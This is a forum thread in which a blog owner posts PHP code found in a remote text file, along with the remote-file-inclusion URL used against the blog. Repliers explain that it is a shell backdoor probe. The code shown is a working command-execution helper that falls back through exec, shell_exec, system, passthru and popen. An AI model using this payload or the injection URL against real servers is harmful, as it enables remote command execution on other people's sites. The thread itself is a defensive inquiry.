Hi guys, just saw this on my blog and wonder what it was

echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

I see it on a url that a user is browsing on my blog
http://www.myblog.co.uk/blog/?_SERVERDOCUMENT_ROOT=http://www.filedomain_is_on.de/pid.txt??

    Without seeing the full extent of the code (where does $cfe come from?) I'd say it's a shell backdoor - effectively letting visitors to your site run commands on the server as the web server user (usually www, apache, or 'nobody').

      effectively letting visitors to your site run commands on the server as the web server user (usually www, apache, or 'nobody').

      That's what i thought. i dont know the rest of the code. I got all this from a textfile on some domain in EU that was linking to my blog.

      Thanks for the info.

        No problem. Don't forget to mark your threads resolved using the "Thread Tools" menu, if this takes care of it.

          it's a hack that tried to run a console command with every possible way, also coded poorly. You should check for every function and their result codes before going for the next. the if elseif approach won't let do that.

            Ok so your saying that this coed was used to try and hack my blog?

            Here is where the file is located at.
            http://www.postcon.de/pid.txt

            I have already tried to conte3ct them to have them explain why this file is on there server and why they tried to hack my blog with it.

              No, by "its a hack" i mean "its a tricky way of doing something" ! What r u? 😃

                what am i?

                eh?

                As i said in my first post.
                I saw a user online in my stats system and he was using a url to the file pid.txt to piggyback onto my blog. All i wanted to know was what was this file doing.

                  Write a Reply...